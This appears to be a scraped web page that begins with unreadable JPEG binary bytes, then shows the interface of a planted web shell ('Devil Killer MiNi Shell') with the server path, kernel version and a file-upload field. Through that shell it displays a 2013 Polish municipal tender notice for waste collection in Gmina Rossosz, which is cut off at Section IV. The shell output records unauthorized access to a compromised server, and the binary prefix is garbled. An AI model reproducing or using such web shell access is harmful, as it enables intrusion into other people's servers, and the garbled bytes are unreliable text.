JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130607/104355-N-2013.html

<p class="kh_header"><b>Rossosz: ODBIÓR, WYWÓZ I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z NIERUCHOMOŚCI ZAMIESZKAŁYCH Z TERENU GMINY ROSSOSZ</b><br>
<b>Numer ogłoszenia: 104355 - 2013; data zamieszczenia: 07.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Rossosz , ul. Lubelska 8, 21-533 Rossosz, woj. lubelskie, tel. 0-83 378 45 57, faks 0-83 378 45 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina@rossosz.pl       // www.rossosz.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR, WYWÓZ I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z NIERUCHOMOŚCI ZAMIESZKAŁYCH Z TERENU GMINY ROSSOSZ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje odbiór, wywóz i zagospodarowanie odpadów
komunalnych z nieruchomości zamieszkałych z terenu gminy Rossosz oraz prowadzenie punktu selektywnej zbiórki odpadów komunalnych o poniższym     
szczegółowym zakresie usługi. 1. Odbieranie następujących frakcji odpadów komunalnych w każdej ilości z nieruchomości, na których zamieszkują mieszkańcy w granicach administracyjnych Gminy Rossosz. Zmieszane odpady komunalne, frakcja mokra tj. mokry papier i tektura, zużyte ręczniki papierowe, chusteczki higieniczne, pieluchy jednorazowe i inne środki higieny osobistej, fusy z kawy i herbaty, skorupki jajek, obierki i resztki kuchenne, odpady tytoniowe.Częstotliwość odbioru. 1 raz w każdym miesiącu.Worek na dany rodzaj frakcji. kolor niebieski, o pojemność 80L. Zmieszane odpady komunalne, frakcja sucha tj. opakowania wielomateriałowe i inne, z wyjątkiem szklanych i z tworzyw sztucznych, papier w tym kolorowy i lakierowany, tektura, guma, skóra, drewno, metal. Częstotliwość odbioru. 1 raz na kwartał; w pierwszym miesiącu każdego kwartału. Worek na dany rodzaj frakcji. kolor czarny, o pojemność 120L. Tworzywa sztuczne tj. butelki, folia, reklamówki i woreczki z tworzyw sztucznych, inne opakowania oraz odpady z tworzyw sztucznych,Częstotliwość odbioru, 1 raz na kwartał; w drugim miesiącu każdego kwartału. Worek na dany rodzaj frakcji, kolor żółty, o pojemność 120L. Szkło,  butelki, opakowania i inne odpady ze szkła.Częstotliwość odbioru, 1 raz na kwartał, w trzecim miesiącu każdego kwartału. Worek na dany rodzaj frakcji, kolor biały, o pojemność 120L. 2. Utworzenie i prowadzenie Punktu selektywnej zbiórki odpadów komunalnych i odbieranie w nim następujących rodzajów odpadów komunalnych,
Przeterminowane leki: 2 razy w roku, w miesiącu maju i październiku. Pojemniki na leki na stałe rozmieszczone w placówkach świadczących świadczenia zdrowotne oraz w punktach aptecznych, łącznie 3 pojemniki. Zużyte baterie, 1 raz w roku
Pojemniki na baterie na stałe rozmieszczone w placówkach oświatowych, wybranych sklepach, Gminnym Ośrodku Kultury, łącznie 8 pojemników. Zużyty sprzęt elektryczny i elektroniczny: 1 raz w roku, w miesiącu październiku. Odpady wielkogabarytowe: 1 raz w roku, w miesiącu październiku. Odpady budowlane, rozbiórkowe: 2 razy w roku (w miesiącu maju i październiku), Zużyte opony: 1 raz w roku, w miesiącu październiku. Odpady niebezpieczne: 1 raz w roku. w miesiącu październiku. Odpady zielone 1 raz w roku, w miesiącu październiku. Pojemniki na leki i baterie zapewnia Wykonawca. Pojemniki na odpady elektryczne i zielone zapewnia Wykonawca. Pojemność pojemników należy dostosować do wielkości strumienia odpadów. Dostarczenie odpadów do Punktu selektywnej zbiórki mieszkańcy wykonywać będą we własnym zakresie. 3. Transport odpadów zebranych z nieruchomości zamieszkałych oraz z Punktu selektywnego zbierania  odpadów komunalnych będzie wykonywał wyłoniony w niniejszym przetargu Wykonawca. Instalacja,  do   której   mają  być   przekazane  odpady  z   terenu   Gminy  Rossosz  tj.  RIPOK   Zakład Zagospodarowania Odpadów dla Regionu Biała Podlaska Bialskie Wodociągi i Kanalizacja Sp. z o.o. w Białej Podlaskiej, ul. Narutowicza 35A, Biała Podlaska. 4. W przypadku awarii RIPOK, Zamawiający dopuszcza przekazanie odpadów do instalacji zastępczych. Dostarczenie odpadów do instalacji zastępczej, w  przypadku  awarii  regionalnej  instalacji, Wykonawca  zobowiązany  będzie wykonać na własny koszt. 5. W przypadku zamieszkania mieszkańców w nowych nieruchomościach, Wykonawca odbierze odpady komunalne z nowych nieruchomości podczas pierwszego odbioru odpadów następującego po przekazaniu informacji o nowym podmiocie, przez Zamawiającego. Zamawiający raz w miesiącu będzie przekazywał pocztą elektroniczną zmiany w bazie danych nieruchomości. W przypadku zmiany deklaracji przez właściciela nieruchomości Zamawiający powiadomi Wykonawcę poprzez przesłanie drogą elektroniczną wykazu zmian do bazy nieruchomości, a wykonawca zastosuje się do przesłanych zmian. 6. Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia z winy Wykonawcy pojemników będących własnością właściciela nieruchomości, Wykonawca zobowiązany będzie do dostarczenia nowych pojemników na swój koszt. 7. Wykonawca zobowiązany będzie do świadczenia usług dodatkowych w zakresie odbioru odpadów komunalnych. Usługi dodatkowe to odbiór na wniosek właściciela z terenu nieruchomości odpadów nieujętych w przedmiocie zamówienia, odpadów problemowych oraz odbioru znacznych ilości odpadów z miejsca wyznaczonego przez właściciela nieruchomości. Koszty takiego odbioru odpadów poniesie właściciel nieruchomości. Cena ofertowa za realizację przedmiotu zamówienia nie obejmuje świadczenia usług dodatkowych. 8.Harmonogram odbioru odpadów komunalnych: Wykonawca opracuje i przedłoży szczegółowy harmonogram odbioru odpadów, ze wskazaniem miejscowości, ulic, numerów nieruchomości i terminów odbierania odpadów komunalnych, dla frakcji wymienionych powyżej. Harmonogram należy tak opracować by odbiór odpadów następował poza dniami wolnymi od pracy (niedziele i święta). Harmonogram powinien być tak skonstruowany by odbiór odpadów był regularny i powtarzalny, co ułatwi mieszkańcom przygotowanie i wystawianie odpadów do odbioru. Harmonogram należy przedłożyć Zamawiającemu do zatwierdzenia minimum na 5 dni przed podpisaniem Umowy na wykonywanie usługi. Harmonogram  zostanie podany  do  wiadomości  mieszkańcom,  poprzez  umieszczenie  na  stronie internetowej oraz na tablicy ogłoszeń Gminy Rossosz i wszystkich sołectw, a także na stronie internetowej Wykonawcy do dnia 28 czerwca 2013 r. W przypadku nieprzewidzialnych okoliczności (np. siła wyższa), za zgodą Zamawiającego, Wykonawca może dokonać okresowej zmiany harmonogramu odbierania odpadów komunalnych, dokonując powiadomienia zgodnie z zasadami opisanymi powyżej. 9. Standardy sanitarne oraz ochrony środowiska dotyczące wykonywania zamówienia, Wykonawca zobowiązany jest do realizacji zamówienia uwzględniając zapisy ustawy z dnia  27 kwietnia 2001 r. o odpadach oraz rozporządzenia Ministra Środowiska w sprawie wymagań odbierania odpadów komunalnych od właścicieli nieruchomości, rozporządzenia Ministra Środowiska w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi, a także uchwały Nr XVIII.95.2012 Rady Gminy Rossosz z dnia 28 grudnia 2012 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Rossosz.10.Wykonawca będzie prowadził usługi odbioru odpadów tak, by nie dochodziło do wysypywania odpadów podczas przemieszczania pojemników do samochodu i załadunku odpadów. Wykonawca uprzątnie odpady, które mimo odpowiedniej obsługi zostały wysypane. Wykonawca uprzątnie i odbierze odpady umieszczone poza pojemnikiem. Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia niewywiązywania się właściciela z obowiązku w zakresie segregacji odpadów, Wykonawca odbiera odpady jako niesegregowane czyl zmieszane odpady komunalne. Wykonawca zobowiązany będzie w terminie 2 dni roboczych od dnia zaistnienia opisanej sytuacji do poinformowania  Zamawiającego  w  formie  pisemnej  lub  drogą  elektroniczną o niewywiązaniu się z  obowiązków  segregacji odpadów   przez  właściciela  nieruchomości.  Do   informacji  Wykonawca zobowiązany będzie  załączyć dokumentację fotograficzną sprzed danej nieruchomości i protokół z zaistnienia takiego zdarzenia. Z dokumentacji  musi jednoznacznie  wynikać,  jakiej  dotyczy nieruchomości, w jakim dniu i o jakiej godzinie doszło do ustalenia ww. zdarzenia. 11. W ramach dokumentowania usług odbioru i zagospodarowania odpadów z nieruchomości zamieszkałych objętych niniejszym zamówieniem oraz w związku z wymogami w zakresie sprawozdawczości określonymi w Ustawie o utrzymaniu czystości i porządku w gminach, podmiot realizujący usługę zobowiązany jest do, Ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze samochodowej w miejscu przekazania odpadów komunalnych odebranych od właścicieli nieruchomości celem ich dalszego zagospodarowania, Przechowywania dokumentów potwierdzających ważenie, oraz udostępnianie ich Zamawiającemu na jego żądanie w trybie określonym umową, Bieżącego prowadzenia ewidencji odpadów odebranych od właścicieli nieruchomości w ramach realizacji umowy z Zamawiającym, zgodnie z przepisami prawa, Sporządzania i przekazywania Zamawiającemu w formie papierowej i elektronicznej kwartalnych sprawozdań wynikających z  ustawy o utrzymaniu czystości i porządku w gminach. Sprawozdania należy składać odrębnie dla nieruchomości, na których zamieszkują mieszkańcy (przedmiot zamówienia) i odrębnie dla pozostałych nieruchomości, od których wykonawca poza przedmiotem umowy, w ramach umów indywidualnych, odbiera odpady komunalne z terenu Gminy Rossosz. Do sprawozdania należy dołączyć Wykaz reklamacji i sposób ich wykonania. Wykonawca  zobowiązany  będzie  do  przekazywania  Zamawiającemu  kart  przekazania odpadów do RIPOK bądź innej jednostki do odbioru odpadów   selektywnie zebranych zgodnie z obowiązującymi wzorami, o jakich mowa w rozporządzeniu Ministra Środowiska z 8 grudnia 2010 r. w  sprawie  wzorów  stosowanych  na  potrzeby  ewidencji  i  odpadów,  rozporządzeniu  Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie zakresu informacji oraz wzorów formularzy służących do sporządzania i przekazywania zbiorczych zestawień danych o odpadach. Wykonawca zobowiązany  będzie  również do  przedkładania Zamawiającemu  innych informacji nt. odbioru, unieszkodliwiania i segregacji odpadów jeśli w  trakcie realizacji zamówienia na Zamawiającego nałożony zostanie obowiązek sporządzania innych sprawozdań z zakresu gospodarki odpadami. Dotyczy to tylko informacji  w  posiadaniu, których będzie Wykonawca, a nie Zamawiający. 12. Rozliczanie usługi odbywa się w cyklu kwartalnym w formie opłaty ryczałtowej na podstawie wystawionej faktury za odbiór i zagospodarowanie odpadów komunalnych odebranych z nieruchomości zamieszkałych na terenie Gminy Rossosz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.10.00-2, 90.51.13.00-5, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wniesienia WADIUM w wysokości 1000 złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wraz z Ofertą złoży oświadczenie o spełnianiu warunków udziału w postępowaniu oraz oświadczenie o braku przesłanek do wykluczenia z postępowania, a także przedstawi kserokopie aktualnych dokumentów z; 1. Właściwego rejestru, 2.Od właściwego Naczelnika Urzędu Skarbowego o nie zaleganiu z opłacaniem podatków, 2. Od właściwego Oddziału ZUS lub KRUS o nie zaleganiu z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, 4. Z Krajowego Rejestru Karnego o nie figurowaniu w tym rejestrze, 5. Wypis z Rejestru działalności regulowanej od Wójta Gminy Rossosz, 6. Zezwolenie od właściwego Starosty na transport odpadów.
Ocena będzie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeśli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wraz z Ofertą wykaże posiadanie wiedzy i doświadczenia niezbędnego do wykonania przedmiotu zamówienia. Wykonawca aby spełnić ten warunek wykaże i udokumentuje za okres ostatnich 3 lat przed wszczęciem postępowania (tj. VI.2010 - V. 2013), a jeśli okres prowadzenia działalności jest krótszy to za ten okres, że świadczył usługi odbioru odpadów komunalnych w łącznej ilości min. 80 Mg w sposób ciągły, które przekazywał do uprawnionego podmiotu przez okres minimum 12 miesięcy oraz wykaże, że usługi odbioru odpadów komunalnych wykonywał lub wykonuje w sposób należyty. 
Ocena będzie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeśli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca do Oferty dołączy wykaz niezbędnego do wykonania zamówienia sprzętu i narzędzi dostepnych Wykonawcy.  
Ocena będzie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeśli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wraz z Ofertą złoży oświadczenie o dysponowaniu osobami zdolnymi do wykonania przedmiotu zamówienia.
Ocena będzie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeśli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wraz z Ofertą wykaże, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia przedstawiając jeden z poniższych dokumentów;
1.W celu zabezpieczenia bieżącego wykonania zamówienia posiada własne środki finansowe lub ma dostęp do kredytu w wysokości minimum 30.000 złotych,          albo 
2. Posiada (opłaconą) polisę ubezpieczeniową OC z tytułu prowadzenia działalności gospodarczej na kwotę nie mniejszą jak 30.000 złotych,                          lub 
3. Przedstawi inny równoważny dokument potwierdzający spełnianie przez Wykonawcę tego wymogu.
Ocena będzie dokonana na zasadzie SPEŁNIA - NIE SPEŁNIA warunki udziału w postępowaniu. Jeśli Wykonawca zostanie oceniony, że nie spełnia w/w warunki to zostanie WYKLUCZONY z niniejszego postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
